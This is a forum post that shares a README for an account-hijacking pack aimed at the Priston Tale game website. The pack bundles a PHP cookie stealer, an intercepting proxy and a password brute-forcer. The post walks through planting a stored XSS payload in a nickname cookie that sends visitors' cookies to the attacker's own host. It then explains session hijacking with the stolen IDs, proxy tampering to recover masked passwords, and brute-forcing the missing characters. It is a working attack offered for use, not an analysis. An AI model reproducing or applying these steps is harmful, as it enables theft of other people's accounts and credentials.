I've kept this private for some while, but since lack of interests in PT, have it bitches.
This is the pack including all neccesary files:
Below is the usage:
And here is the achilles usage:Quote:
I(CLEARSCREEN) STRONGLY RECOMMEND YOU READ THIS ENTIRE FILE)
This document should include 5 files:
- Achilles.rar
- PTBrute04-SOURCE.rar
- PTBrute04-COMPILED.rar
- Cookie-Stealer.rar
- The README.TXT you are reading now.
I will give an explanation on how to get started quickly.
Start by unpacking Cookie-Stealer.rar, and you will notice
you have 2 files: c.php and cook.dat, the php file will
be the file that is going to store the cookies from the users
into the cook.dat file. Just upload both files somewhere
(cook.dat must be empty) and to make sure it will work set
the chmod for cook.dat to 777 (editable/readable for all).
If you really want to make sure the stealer is working,
once you have uploaded browse to
and notice if you got a line that says test in your .dat file.
Now that you have your cookiestealer setup, let's steal some cookies!
Browse to eng.pristontale.com and login with an account. This will give
us some cookies to ensure we're properly logged in. Also make sure
you are using FireFox (If you don't have it: mozilla.com),
it's very usefull if we want to edit our own cookies. Right, once
you're logged in go to these menu's in Firefox:
Tools => Options => Privacy => Cookies, once you're there,
click on the "Stored cookies..." button. This will open a menu.
Scroll all the way down to PristonTale.com and delete the cookie
named: NickName. Once you have done that just keep clicking OK
until you're back to the PristonTale.com page. What you just
have done is deleting the original nickname cookie to make sure
it won't bring any trouble when we create our own cookie with
the same name.
Ok, you have your cookie stealer set up, deleted your NickName
cookie, now it is time to enter our own NickName cookie, we
will do this by using JavaScript. Enter the following line
in your URL-bar: javascript:void(document.cookie='NickName=
<script>top.location.href="http://site.com/c.php?c=" + document.cookie</script>')
Ofcourse, you should edit site.com to your own hosting address.
Now our "NickName" cookie is containing a javascript that redirects
the user to our site, and sends a parameter with it, the cookie!
You can probably guess what happens, if a user looks at your nickname,
the javascript is triggered and the user is redirect to your page;
his cookie gets stolen, and he gets logged out by our script.
(to make the user redirect to eng.pristontale.com so he will think
it is a problem with the board instead of an attempt to hack his account)
Last thing you should do is disable javascript (so you don't get
redirected yourself when you're inserting the stuff in their database).
It's easy, just go to:
Tools => Options => WebFunctions => Disable Javascript.
If you did that, just browse to the Priston Tale boards, click on the
first topic you see, and just make a post with any contents you want.
Great! When a logged in user now goes to the topic, the javascript
code will be activated and soon you'll have a nice list of cookies!
(Note: You can't create a topic yourself with this method, if you
really want your own topic to "own" users, just login with another
account(use IE this time!!) and create the topic, then infect the
topic with your other account that has the NickName infection)
So! You did it all properly and you have a nice list of cookies from
users. What now? I will first explain you what the cookies stand for:
A basic cookie set (they use multiple cookies) contains these cookies:
- EUserPMNo = A unique code for each user, will look like this:
[first char of userid][some numbers]. Example: C43229
- EUserID = The user login name.
- NickName = The nickname which is required for display on the
eng.pristontale.com boards.
- EP = This is probably the password hash, I haven't been able to
decrypt it so far, maybe you can!
- ASP.NET_SessionId = Don't worry about this one, just some unique
sessionid they used for their ASP Pages.
- EBlockUser = This is what they use to display the banning messages
also not very important for what we're going to do.
- Some more unimportant stuff (mostly stuff like ECertify=checked
and PopUp=NO)
Ok, let's get down to business, what we need is the EUserPMNo and
the EUserID. Open up notepad and take these values of the victim
you want to hack.
The reason we need these things is because the EPT site will only
need these two things to log you in, it will not checksum the EP
(password) hash, if you just have the PMNo and ID you're able to
login. I'll just make up 2 examples to make it easier for you to
understand:
EUserPMNo=C23043
EUserID=Clearscreen
Now, launch up firefox again, log in to your account again, and enter
these two lines into your URL-Box again, ofcourse again edited by you
with the correct PMNo and ID, once you press Enter it will look like
nothing happened, but something did, so don't worry about that either.
Ok here it is:
javascript:void(document.cookie='EUserID=Clearscre en')
javascript:void(document.cookie='EUserPMNo=C23043' )
When you're done just hit F5(or press the refresh button) and you'll
probably see on your left: Welcome xxxx(in my case Clearscreen).
Wow! Good security PristonTale! Now comes the tricky part which
I can't cover fully in this little tutorial. Unpack Achilles.rar
and open the Achilles file, this acts like a proxy but basicly it
is able to intercept all data from the server and the client. So just
hit interception mode on and Start it. There are so many uses with this
program so I suggest you take a look at google to fully understand how
this works.
Whatever, go the the Modify > "Lost email/ID/password" page and select
E-Mail, now you will need to have some basic knowledge of Achilles,
set the proxy to localhost, and the port you configured in Achilles,
and skip that part of the retrieval page (again, use google and
look for Achilles tutorials!!!)
Wooooohoooo! You skipped the retrieval part and now the PT page will
give you some info, including the password! Hmmmmmmmm.. but there's
still something wrong, the password is provided but it is missing the
first 2 characters! Well, you can guess it sometimes, like:
dragon12 = xxagon12, but sometimes you cant. xxme ??? Lame? Game?
Fame? That's why I created the PT Bruter.
Let's take my previous example again, I managed to get to that part
of PT that provides me with the chopped of password. Unfortuneatly,
it says: **me. Create a file called a.txt on your desktop and fill it
in like this:
Clearscreen/me (just remove the *'s).
Save it, and then launch up the PTBrute04.exe that you could retrieve from
the PTBrute04-COMPILED.rar. Fill in the correct path to your a.txt
and press Load File! If you have done it correctly, you will see the
user in a list, together with the password in the list right next
to it. Click on the username, and select your method of cracking,
we'll go for a to z this time, because Im guessing it wont be something
like: 34me. Then click on: "Brute that shit". And be patient! It will crack it
eventually.
I've set an interval of 3 or 4 seconds between each try, if you would choose
a to z it will take this time to crack: (NOTE: MAXIMUM TIME!!!!!)
((26*26) * 3/4) / 60 (alphabet contains 26 chars, possibilities are 26x26)
and that leaves about: 30 minutes max. If you're not satisfied with the
intervals, just change them in the source (look for the "Wait" lines)
Well, if you did it _ALL_ correctly, you should've gotten a password in
the result box of the program! You can use multiple lines in your a.txt
file too ofcourse!
Enjoy!
- Written by clearscreen (
ONE MAJORRRRRR THING YOU NEED TO KNOW... THIS IS EXACTLY THE SAME METHOD BUT USING ANOTHER XSS BUG.Quote:
Ok, since some people can't find anything on google
about Achilles (hi bobo^^) I(clearscreen) decided to
write a little tutorial about this very usefull application!
Note: THIS METHOD ONLY WORKS IN INTERNET EXPLORER!!!!
Ok let's get started. Login with a normal account (not hacked)
Continue to the Change Password page (just press modify) and
launch up achilles, set only these options: Intercept Client Data
and Intercept Server Data. (don't turn Intercept mode on or anything
else). Hit the run button, and set your proxy in Internet Explorer
to be 127.0.0.1 on port 5000 (default Achilles port). Now press
modify on the Pristontale page, there will be all kinds of data
on your achilles screen. Just press send without doing anything,
go back to the page and press modify again, you will receive more
data in your Achilles screen, saying something about Object moved.
Just press send again and you will probably receive new data, (if not,
you know what to do ;p Press the modify button again!!).
Ok this 3rd data page is very important, so dont just go and press
the send button! Before we do that we need to change 2 important
things in our cookie thingy's in Achilles, just change the EUserID
from your normal account to the EUserID of the user you stole the
cookies from. Do the same for the EUserPMNo, once you've done that
press the Send button in Achilles again. You will probably receive another
Object moved page, in that case hit send, if you get a large page with
all kinds of table stuff etc, you know this is the page we want.
Just select all data and paste it in notepad, the part of the password
is in this file somewhere! Hit control + f and look for **
(those characters are used to mask the 2 first characters of the original
password!). The rest of the password will be followed by those 2 **.
Example: **earscreen!
Enjoy!
INSTEAD OF PUTTING THE JAVASCRIPT IN THE REGISTRY PUT IT BEHIND THIS URL AND REDIRECT THE USERS TO THIS URL!!!!!!
HEREEXAMPLE!!!!!!
INSTEAD OF THE ALERT USE THE SAME METHOD TO REDIRECT TO YOUR COOKIE STEALER!
GOOD LUCK
Clearscreen signing off :P
